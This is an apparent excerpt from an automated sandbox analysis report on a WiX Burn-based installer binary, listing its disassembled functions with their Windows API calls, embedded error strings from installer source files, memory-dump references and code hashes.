                                                                                                                                                              • search.cpp, xrefs: 007C9CDB
                                                                                                                                                              • Failed to set variable., xrefs: 007C9D2B
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9C93
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                              • API String ID: 1811509786-2053429945
                                                                                                                                                              • Opcode ID: 5f299d5e904e25e9f5f409f459c8e5e7a9a3fa623da3b2747b48c5a329fcf794
                                                                                                                                                              • Instruction ID: a96448cba4ab7a3a16a0395fbccfcbdbe227fb7b3468a97369be99367cf82909
                                                                                                                                                              • Opcode Fuzzy Hash: 5f299d5e904e25e9f5f409f459c8e5e7a9a3fa623da3b2747b48c5a329fcf794
                                                                                                                                                              • Instruction Fuzzy Hash: A3210833A41524FADBA116A48C8EFAEB768FF11771F20022DFF15B61D0D7299D10A6E1
                                                                                                                                                              Function 007DAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • TlsSetValue.KERNEL32(?,?), ref: 007DAD57
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007DAD61
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 007DADA0
                                                                                                                                                              • CoUninitialize.OLE32(?,007DC721,?,?), ref: 007DADDD
                                                                                                                                                              Strings
                                                                                                                                                              • elevation.cpp, xrefs: 007DAD85
                                                                                                                                                              • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 007DAD8F
                                                                                                                                                              • Failed to initialize COM., xrefs: 007DADAC
                                                                                                                                                              • Failed to pump messages in child process., xrefs: 007DADCB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                              • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                              • API String ID: 876858697-113251691
                                                                                                                                                              • Opcode ID: 86590761f44d2093236040f7315754f6642c9e064f7dc8493a03782f14606a9b
                                                                                                                                                              • Instruction ID: a5f071a1b7970ecb1fdbdd6502432c9ae450653c35a78788e627f794a1163fad
                                                                                                                                                              • Opcode Fuzzy Hash: 86590761f44d2093236040f7315754f6642c9e064f7dc8493a03782f14606a9b
                                                                                                                                                              • Instruction Fuzzy Hash: 0211E373A45635BBC72217549C0AD9EBEB8FF04B72B110117FD00B7750EB689D0096D2
                                                                                                                                                              Function 007C5CE2 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 54registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 007C5D68
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
                                                                                                                                                                • Part of subcall function 008010B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue$Close
                                                                                                                                                              • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                              • API String ID: 1979452859-3209209246
                                                                                                                                                              • Opcode ID: 400ca159d9779990f5c1d8c990b3c25b6caa2f2bf9967ba1a9ea2bd92d971d2d
                                                                                                                                                              • Instruction ID: 291cb83c117a0b95dd80b2fa194268216a1c74d31792622e3a210e2b1067c0db
                                                                                                                                                              • Opcode Fuzzy Hash: 400ca159d9779990f5c1d8c990b3c25b6caa2f2bf9967ba1a9ea2bd92d971d2d
                                                                                                                                                              • Instruction Fuzzy Hash: B701F572B44B29F7CB6256D88C0AFAE7768EB00730F14425DF901FA2A1D77A9E409691
                                                                                                                                                              Function 007EA271 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 174COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 007EA33E
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 007EA348
                                                                                                                                                              Strings
                                                                                                                                                              • download, xrefs: 007EA308
                                                                                                                                                              • Failed to clear readonly bit on payload destination path: %ls, xrefs: 007EA377
                                                                                                                                                              • :, xrefs: 007EA3C1
                                                                                                                                                              • apply.cpp, xrefs: 007EA36C
                                                                                                                                                              • Failed attempt to download URL: '%ls' to: '%ls', xrefs: 007EA425
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLast
                                                                                                                                                              • String ID: :$Failed attempt to download URL: '%ls' to: '%ls'$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$download
                                                                                                                                                              • API String ID: 1799206407-1905830404
                                                                                                                                                              • Opcode ID: 24e623f2ccd9876772f37eef45d43293725f07f20464e1c71f3793856c3b8f88
                                                                                                                                                              • Instruction ID: ec557c9a5c504d72e8fbe71702294f92b4e47288365b3b5716ab02a5830e39a1
                                                                                                                                                              • Opcode Fuzzy Hash: 24e623f2ccd9876772f37eef45d43293725f07f20464e1c71f3793856c3b8f88
                                                                                                                                                              • Instruction Fuzzy Hash: 0D519271A01255FBDB11DF9AC845EAEB7B9FF58710F108059E904EB240E379EA40CB92
                                                                                                                                                              Function 008084C7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 156COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007C394F: GetProcessHeap.KERNEL32(?,000001C7,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3960
                                                                                                                                                                • Part of subcall function 007C394F: RtlAllocateHeap.NTDLL(00000000,?,007C2274,000001C7,00000001,80004005,8007139F,?,?,00800267,8007139F,?,00000000,00000000,8007139F), ref: 007C3967
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000010,00000001,00000000,00000000,00000410,?,?,007E9063,000002C0,00000100), ref: 008084F5
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF,?,?,007E9063,000002C0,00000100,000002C0,000002C0,00000100,000002C0,00000410), ref: 00808510
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareHeapString$AllocateProcess
                                                                                                                                                              • String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
                                                                                                                                                              • API String ID: 2664528157-4206478990
                                                                                                                                                              • Opcode ID: a0e42e15f371709951a39b8151d9bfaa5be55061409f045b4c8e11cf21970cc6
                                                                                                                                                              • Instruction ID: 9417acbacafb8370a18d07d353d3efed7581ffc15a6a848270a9a37f76a0e485
                                                                                                                                                              • Opcode Fuzzy Hash: a0e42e15f371709951a39b8151d9bfaa5be55061409f045b4c8e11cf21970cc6
                                                                                                                                                              • Instruction Fuzzy Hash: 5751AF71644705EFDBA09F14CC86F1A7BA5FB10720F218618FAA5EB3D2DB75E9808B50
                                                                                                                                                              Function 008064B7 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00806513
                                                                                                                                                              • DeleteFileW.KERNEL32(00000410,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 0080660A
                                                                                                                                                              • CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000410,?,?,?,00000078,000000FF,?,?,00000078), ref: 00806619
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseDeleteErrorFileHandleLast
                                                                                                                                                              • String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
                                                                                                                                                              • API String ID: 3522763407-1704223933
                                                                                                                                                              • Opcode ID: 617e4c9f1d014f65b18ddafded6bdefd8e960a8080be61185614fd349e00196e
                                                                                                                                                              • Instruction ID: 7c3effffd8afe6d84a280654607bdc9160128d9b8fb2f98e193be7c726ff6785
                                                                                                                                                              • Opcode Fuzzy Hash: 617e4c9f1d014f65b18ddafded6bdefd8e960a8080be61185614fd349e00196e
                                                                                                                                                              • Instruction Fuzzy Hash: F951087290012ABFDB51DFA48C45EAEBBB9FF08710F044165FA24E6190E7358A619BA1
                                                                                                                                                              Function 007C9EC7 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9EED
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9F12
                                                                                                                                                              Strings
                                                                                                                                                              • MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 007CA006
                                                                                                                                                              • Failed to format product code string., xrefs: 007C9F1D
                                                                                                                                                              • Failed to get component path: %d, xrefs: 007C9F76
                                                                                                                                                              • Failed to format component id string., xrefs: 007C9EF8
                                                                                                                                                              • Failed to set variable., xrefs: 007C9FF6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open@16
                                                                                                                                                              • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                              • API String ID: 3613110473-1671347822
                                                                                                                                                              • Opcode ID: 2da95c2188caa8ed5b6ddf8c8b21d212179c8ea5c742c19439757508e9e9828c
                                                                                                                                                              • Instruction ID: 2c6b3a4a74d8cc51749891f5f0ae2c225b3e982efb98d6ade3da102c0834fa03
                                                                                                                                                              • Opcode Fuzzy Hash: 2da95c2188caa8ed5b6ddf8c8b21d212179c8ea5c742c19439757508e9e9828c
                                                                                                                                                              • Instruction Fuzzy Hash: F441B632900115BACFA59AA88C4EFBEB7A8FF05320F24461EF614F21D1E7399E50D752
                                                                                                                                                              Function 007CF812 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF942
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF94F
                                                                                                                                                              Strings
                                                                                                                                                              • Resume, xrefs: 007CF8B6
                                                                                                                                                              • Failed to read Resume value., xrefs: 007CF8D8
                                                                                                                                                              • %ls.RebootRequired, xrefs: 007CF82F
                                                                                                                                                              • Failed to format pending restart registry key to read., xrefs: 007CF846
                                                                                                                                                              • Failed to open registration key., xrefs: 007CF8AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                              • API String ID: 3535843008-3890505273
                                                                                                                                                              • Opcode ID: 652f3b92dcf81621e92e1cc27fd9f9f67e0afebd6e46f23455cbbf0972b4c47d
                                                                                                                                                              • Instruction ID: ed1f1cf7036990b1164011555c63bb288306ba8f52d6697d4a7067d32fb41fcf
                                                                                                                                                              • Opcode Fuzzy Hash: 652f3b92dcf81621e92e1cc27fd9f9f67e0afebd6e46f23455cbbf0972b4c47d
                                                                                                                                                              • Instruction Fuzzy Hash: 29412971900119FFDF119F98C881FA9BBA6FB04310F55817EE910EB260C37AAE419B51
                                                                                                                                                              Function 007DAA00 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                              • API String ID: 0-660234312
                                                                                                                                                              • Opcode ID: 9c7f410afeaf965e08ca4ccd0d2164494d79eabac077638bf535897952add64d
                                                                                                                                                              • Instruction ID: bba7aa5c21ba8bb74bfc1d4bd99e2ad021ec0e4f5d24e3a6d6c4ca4212f2764c
                                                                                                                                                              • Opcode Fuzzy Hash: 9c7f410afeaf965e08ca4ccd0d2164494d79eabac077638bf535897952add64d
                                                                                                                                                              • Instruction Fuzzy Hash: 4E31B372904119BBCB229A94CC45E9EBB7AFB40720F214367F820F63D1EB759D41D691
                                                                                                                                                              Function 007ED8B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(00820C4C,00000000,00000017,00820C5C,?,?,00000000,00000000,?,?,?,?,?,007EDEE7,00000000,00000000), ref: 007ED8E8
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create IBackgroundCopyManager., xrefs: 007ED8F4
                                                                                                                                                              • Failed to set notification flags for BITS job., xrefs: 007ED93A
                                                                                                                                                              • Failed to create BITS job., xrefs: 007ED922
                                                                                                                                                              • Failed to set BITS job to foreground., xrefs: 007ED969
                                                                                                                                                              • Failed to set progress timeout., xrefs: 007ED952
                                                                                                                                                              • WixBurn, xrefs: 007ED913
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                              • API String ID: 542301482-468763447
                                                                                                                                                              • Opcode ID: fe015132667b55370d66390c8eb4ada7563cf3487ba0e26952d34d1343f44083
                                                                                                                                                              • Instruction ID: 53fcac711fadbbced4515f6d38725b0cdd6ff56d0bfd884bb0ad0899c19e7982
                                                                                                                                                              • Opcode Fuzzy Hash: fe015132667b55370d66390c8eb4ada7563cf3487ba0e26952d34d1343f44083
                                                                                                                                                              • Instruction Fuzzy Hash: 4531A271F4136AAFDB24DBA9D845EAFBBB4EF48710B100159E901EB351CA38AC45CB91
                                                                                                                                                              Function 00805DAE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00805DF8
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805E05
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00805E4C
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00805E80
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00805EB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLast$CloseCreateHandleRead
                                                                                                                                                              • String ID: %ls.R$dlutil.cpp
                                                                                                                                                              • API String ID: 3160720760-657863730
                                                                                                                                                              • Opcode ID: 9e49cdfbe101fe3b93376ab4ce458c744bdbaedf3cb4bf03c465aa6a3cda283c
                                                                                                                                                              • Instruction ID: 76208dda41e6cef93453c244452a53789b3cddf5d9544c4fdf5ba79cb2668779
                                                                                                                                                              • Opcode Fuzzy Hash: 9e49cdfbe101fe3b93376ab4ce458c744bdbaedf3cb4bf03c465aa6a3cda283c
                                                                                                                                                              • Instruction Fuzzy Hash: E031E772941625ABE7608B54CC49B6F7BA8FF01721F114229FE55EB2C0D7749E008AF0
                                                                                                                                                              Function 007CC8E6 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 98fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CCD5E: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,007CE444,000000FF,00000000,00000000,007CE444,?,?,007CDBEB,?,?,?,?), ref: 007CCD89
                                                                                                                                                              • CreateFileW.KERNEL32(E90080BA,80000000,00000005,00000000,00000003,08000000,00000000,007C53C5,?,00000000,840F01E8,14680A79,00000001,007C53BD,00000000,007C5489), ref: 007CC956
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,007D7809,007C566D,007C5479,007C5479,00000000,?,007C5489,FFF9E89D,007C5489,007C54BD,007C5445,?,007C5445), ref: 007CC99B
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to verify catalog signature: %ls, xrefs: 007CC994
                                                                                                                                                              • Failed to get catalog local file path, xrefs: 007CC9D9
                                                                                                                                                              • Failed to open catalog in working path: %ls, xrefs: 007CC9C9
                                                                                                                                                              • catalog.cpp, xrefs: 007CC9BC
                                                                                                                                                              • Failed to find payload for catalog file., xrefs: 007CC9E0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareCreateErrorFileLastString
                                                                                                                                                              • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                              • API String ID: 1774366664-48089280
                                                                                                                                                              • Opcode ID: 4658fec68cd2aa6edd2ad0ea7a49c162c309a648154a9386a8a5b130ebd5f02f
                                                                                                                                                              • Instruction ID: 97d7b0afdba6b65640028f5684f3d4f4f34415ebc8154399264095eebdb73a82
                                                                                                                                                              • Opcode Fuzzy Hash: 4658fec68cd2aa6edd2ad0ea7a49c162c309a648154a9386a8a5b130ebd5f02f
                                                                                                                                                              • Instruction Fuzzy Hash: B931E772900625BBD7229B54CC06F59BBA4FF04720F21816EFA18EB281E779BD109BD0
                                                                                                                                                              Function 007ED33E Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,007ED642,?), ref: 007ED357
                                                                                                                                                              • ReleaseMutex.KERNEL32(?,?,?,?,007ED642,?), ref: 007ED375
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED3B6
                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 007ED3CD
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 007ED3D6
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to get message from netfx chainer., xrefs: 007ED3F7
                                                                                                                                                              • Failed to send files in use message from netfx chainer., xrefs: 007ED41C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MutexObjectReleaseSingleWait$Event
